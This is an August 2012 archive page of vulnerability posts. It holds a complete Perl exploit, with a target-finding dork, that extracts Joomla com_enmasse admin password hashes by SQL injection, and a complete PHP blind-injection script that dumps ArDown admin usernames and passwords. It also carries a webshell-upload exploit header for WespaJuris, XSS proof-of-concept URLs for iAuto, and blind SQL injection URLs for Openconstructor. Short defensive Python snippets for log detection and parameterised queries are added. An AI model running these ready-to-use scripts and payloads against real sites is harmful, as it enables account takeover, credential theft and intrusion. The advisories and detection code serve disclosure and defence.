Archive for 08 August 2012

WespaJuris 3.0 Multiple Vulnerabilities

The WespaJuris 3.0 vulnerabilities have been published. The description of the vulnerabilities and the exploit are attached.

_______________________________________________

# Exploit Title: WespaJuris <= 3.0 auto exploit
# Date: 07th august 2012
# Exploit Author: WhiteCollarGroup
# Vendor Homepage: http://www.wespadigital.com.br/
# Software Link: http://www.wespadigital.com.br/download/wespajuris_v3_0_2012.rar
# Version: 3.0
# Tested on: Apache Server
WespaJuris is a software for law firms.
Use this exploit to upload a webshell on vulnerable applications.
Usage:
    php exploit.php

Joomla com_enmasse SQL Injection Vulnerability

An SQL injection vulnerability was found in the Joomla com_enmasse extension. As is well known, SQL injection vulnerabilities had already been found in a very large share of Joomla's extensions, and as this shows, SQL injection vulnerabilities are still being found in extensions. SQL injection and Perl exploit below. It needs to be patched as soon as possible.

____________________________________________________________

#!/usr/bin/perl -w

########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
#
# Dork: inurl:index.php?option=com_enmasse
#
# Date: [06-08-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter:
#
# site: http://poisonsecurity.wordpress.com/
#
# Vendor: http://www.matamko.com/
#
# Version: 1.2.0.4 (last update on Jul 27, 2012)
#
# License: Enmasse 6 Months Support & Subscription - USD$358.20
#
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
#
# Tested on: [Linux(bt5)-Windows(7ultimate)]
#
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....
########################################

print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t        Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";

use LWP::UserAgent;

print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);

$concatene="concat(password)";
$table="jos_users";
$d4nb4r="floor";
$com="com_enmasse";
$seleccione="select";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~/([0-:a-fA-F]{32})/) {
    print "\n Hash Admin : $1\n\n";
    print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
    print " The exploit was successful if you want to see more data modify the script\n";
}
else{print "\n[-] No se pudo, intente manualmente\n";}

#####Daniel Barragan D4NB4R 2012################
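As an added defender-side example (not part of the exploit or the original post), the following Python scans web-server access-log lines for the signature of the error-based floor(rand(0)*2) / GROUP BY injection that the script above sends in the sortBy parameter; the log lines, IP addresses and the shortened payload are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based (double-query) injection used against
# com_enmasse's sortBy parameter; matched after URL-decoding the request.
SIGNATURES = {
    "double_query_error": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by_probe": re.compile(r"group\s+by\s+\w+\s*\)\s*a\s*\)", re.I),
    "schema_walk": re.compile(r"information_schema", re.I),
    "tautology": re.compile(r"\band\s+1\s*=\s*1\b", re.I),
}

# Apache/nginx combined log format: ip ident user [ts] "METHOD url proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log: one benign com_enmasse request, one carrying the
# injection structure (password extraction replaced by a constant), one unrelated.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2012:10:15:01 +0300] "GET /index.php?option=com_enmasse&controller=deal&sortBy=117 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Aug/2012:10:15:03 +0300] "GET /index.php?option=com_enmasse&controller=deal&sortBy=117%20and(select%201%20from(select%20count(*),concat((select%201),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 500 1203',
    '198.51.100.4 - - [08/Aug/2012:10:16:40 +0300] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8800',
]


def classify_url(url):
    """Return the sorted list of signature names matching the decoded URL."""
    decoded = unquote_plus(url)  # decode %20 / %2C / '+' before matching
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_access_log(lines):
    """Return (line_no, client_ip, signatures) for every request that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        sigs = classify_url(m.group("url"))
        if sigs:
            hits.append((n, m.group("ip"), sigs))
    return hits
```

A 500 status on the flagged line is consistent with the technique, which relies on the database raising a duplicate-key error to leak the concatenated value.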

ArDown Remote Blind SQL Injection

A remote blind SQL injection vulnerability was found in all versions of ArDown. The script for exploiting the vulnerability is below; the vulnerability should be patched.

_______________________________________________
ArDown (All Version) <- Remote Blind SQL Injection

<?php
echo "    [*]-----------------------------------------------------------------------[*]
    # Exploit Title  : ArDown (All Version) <- Remote Blind SQL Injection
    # Google Dork    : 'powered by AraDown'
    # Date           : 08/07/2012
    # Exploit Author : G-B
    # Email          :
    # Software Link  : http://aradown.info/
    # Version        : All Version
    [*]-----------------------------------------------------------------------[*]

[*] Target -> ";

$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p',
            'q','r','s','t','u','v','w','x','y','z');

echo "[*] Username : ";
for($i=1;$i<=30;$i++){
    foreach($ar as $char){
        $b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
        if(eregi('<span align="center"></span>',$b) && $char == 'z'){
            $i = 50;
            break;
        }
        if(eregi('<span align="center"></span>',$b)) continue;
        echo $char;
        break;
    }
}

echo "\n[*] Password : ";
for($i=1;$i<=32;$i++){
    foreach($ar as $char){
        $b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
        if(eregi('<span align="center"></span>',$b)) continue;
        echo $char;
        break;
    }
}

function send($target,$query){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    $r = curl_exec($ch);
    curl_close($ch);
    return $r;
}
function stdin(){
    $fp = fopen("php://stdin","r");
    $line = trim(fgets($fp));
    fclose($fp);
    return $line;
}
?>

__________________________________________________________________

 

iAuto Mobile Application 2012 Multiple Vulnerabilities

Vulnerabilities in the 2012 version of the iAuto Mobile Application

Title:  iAuto Mobile Application 2012 – Multiple Web Vulnerabilities

Date: 2012-07-11

References: http://www.vulnerability-lab.com/get_content.php?id=658

VL-ID: 658

Common Vulnerability Scoring System: 3.5

Introduction: With Internet on mobile devices booming, having a desktop-oriented version is just not enough anymore. Empower your visitors with content designed for mobile Web by offering them a mobile version of your classifieds website. WorksForWeb is offering custom-made mobile frontend addons for our classified solutions. The mobile version of your website will present all the data of the regular website in the format optimized for iPhone, Android, iPad, BlackBerry, Symbian, or other mobile devices. Mobile frontend addon features:

Quick and advanced search, Browsing, Tabbed design, Multi-language interface, Google Maps, and much more.

Addon is seamlessly integrated with your main website. Your website automatically detects mobile browsers to redirect mobile visitors to the mobile-optimized content. Why do you need a mobile gateway to your website? Because all the market leaders have mobile access, and so should you. The mobile technology is redefining our future, and you should be one step ahead of your smaller competitors. Mobile users now make up a large percentage of your target audience, and their needs to access information easily are important to address. At this moment, the mobile addon is compatible with classified solutions of v.5.2 and above. The price of the mobile frontend addon is only $175. This price includes a free expert installation on your server.

(Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )

Abstract: The Vulnerability Laboratory Research Team discovered multiple cross site vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.

Report-Timeline:
================
2012-07-10: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
1.1 A persistent input validation vulnerability is detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the comments module with the bound vulnerable commentSid parameter. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction & a privileged user account.

Vulnerable Module(s):
        [+] Comments > Reply to The Comment Listing

Vulnerable Parameter(s):
        [+] commentSid & commentInfo

1.2 Multiple non-persistent cross site scripting vulnerabilities are detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction or a local low privileged user account. The bugs are located in Dealer > Search Sellers or Browse by Make and Model with the bound vulnerable parameters city & path/url. Successful exploitation can result in account steal, client side phishing & client-side content request manipulation. Exploitation requires medium or high user interaction & no privileged web application user account.

Vulnerable Module(s):
        [+] Dealer > Search Sellers > City
        [+] Browse by Make and Model > /../ >

Vulnerable Parameter(s):
        [+] City
        [+] Folder Access Listing

Proof of Concept:
=================
1.1 The persistent vulnerabilities can be exploited by remote attackers with a low privileged user account and with low required user interaction. For demonstration or reproduce …

Review:  Add Comments – Listing

<div> <h1>Reply to The Comment</h1> <div> <div>You are replying to the comment #"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' <="" to="" listing="" #448="" "<span="" height="900" width="1000">2007</span> <span>Acura</span>

 

1.2 The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user interaction. For demonstration or reproduce …

String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <

Dealer > Search Sellers > City

PoC: http://iauto.xxx.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+ width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search

Browse by Make and Model / AC Cobra / >

PoC: http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20 width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/

Comments > Reply to The Comment > Topic & Text (commentSid)

PoC: http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000 %20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F

Risk:
=====
1.1 The security risk of the persistent input validation vulnerability is estimated as medium(+).

1.2 The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ()

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact ( or ) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

Openconstructor CMS Parameter Multiple SQL Injection

An SQL injection vulnerability was found in Openconstructor CMS version 3.12.0. The vulnerability in the parameter of openconstructor/getimage/showimage.php needs to be patched as soon as possible.

______________________________________________________________________

Title: Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities

Affected Software:

http://www.openconstructor.org/

http://code./downloads/list

http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234

Description:

Openconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP.

Multiple SQL injection vulnerabilities exist in the 'id' parameter, which is used across different sections of the application.

Version 3.12.0 is vulnerable; previous versions may be affected, but they have not been tested.

CVE: CVE-2012-3873

Impact: Authenticated attackers can execute arbitrary SQL queries.

CVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Credits: Lorenzo Cantoni

Details: The following lines of code are the cause of the issue:

 

$ds->get_record($_GET['id'])

 

get_record() performs a query on the database without checking the user-supplied data in the 'id' parameter. The following pages are vulnerable:

data/gallery/edit.php

data/guestbook/edit.php

data/file/edit.php

data/htmltext/edit.php

data/publication/edit.php

data/event/edit.php

'getimage/showimage.php' is also vulnerable, due to the following lines of code:

$res = $db->query(
                'SELECT id, name, filename, size, type, date'.
                ' FROM dsfile'.
                ' WHERE id='.$_GET['id']
    );

 

Proof of Concept: An object (e.g. a gallery object, file object, guestbook object …) must first be created or has to already exist in order to exploit the vulnerability.

For instance, if a guestbook object has been created, an attacker can open it in the edit page and exploit a blind SQL injection as follows:

AND 1=1 returns a TRUE value for the query

http://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 returns a FALSE value for the query

In my test environment, I have been able to confirm the possibility to execute queries with the following commands:

AND (select @)=’5.5.16-log’ returns a TRUE value for the query

http://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @)=’5.5.16-foo’ returns a FALSE value for the query

On ‘getimage/showimage.php’, an image file must be first successfully uploaded. The exploitation is very similar:

  returns a FALSE value for the query

http://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@)=’5.5.16-log’  returns a TRUE value for the query
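The following Python example is added here (it is not the advisory author's code) to show, against a constructed in-memory SQLite stand-in for the dsfile table, why the concatenated 'id' above acts as a true/false oracle for the AND 1=1 / AND 1=2 pair used in this advisory and in the ArDown blind injection earlier on the page, and how a validated, parameterised lookup removes that signal; the table rows and function names are constructed for this example.

```python
import re
import sqlite3

# Constructed stand-in for Openconstructor's dsfile table: the column list is
# the one quoted in the advisory, the rows are made up for this example.
SCHEMA = ("CREATE TABLE dsfile (id INTEGER, name TEXT, filename TEXT, "
          "size INTEGER, type TEXT, date TEXT)")
ROWS = [
    (1, "logo", "logo.png", 2048, "image/png", "2012-08-01"),
    (4, "photo", "photo.jpg", 81920, "image/jpeg", "2012-08-03"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany("INSERT INTO dsfile VALUES (?,?,?,?,?,?)", ROWS)
    return db


def showimage_vulnerable(db, raw_id):
    """Mirrors showimage.php: the raw id string is concatenated into the SQL."""
    sql = "SELECT id, name, filename, size, type, date FROM dsfile WHERE id=" + raw_id
    return db.execute(sql).fetchone()


def showimage_hardened(db, raw_id):
    """Same lookup with strict input validation and a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name, filename, size, type, date FROM dsfile WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchone()


def blind_oracle_demo(db):
    """True/false oracle: the appended condition changes whether a row comes back
    from the vulnerable lookup, while the hardened one rejects the input outright."""
    results = {
        "vuln_true": showimage_vulnerable(db, "4 AND 1=1") is not None,
        "vuln_false": showimage_vulnerable(db, "4 AND 1=2") is not None,
        "hardened_ok": showimage_hardened(db, "4") is not None,
    }
    try:
        showimage_hardened(db, "4 AND 1=1")
        results["hardened_rejects"] = False
    except ValueError:
        results["hardened_rejects"] = True
    return results
```

The difference between the two booleans in the vulnerable case is exactly the one-bit leak the blind technique on this page is built on; the hardened path yields the same 400-style rejection for every non-numeric input, so no such bit exists.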

Disclosure

[08/07/2012] Lead Developer contacted.

[22/07/2012] No response. Sent another mail.

[04/08/2012] Still no response. Public disclosure.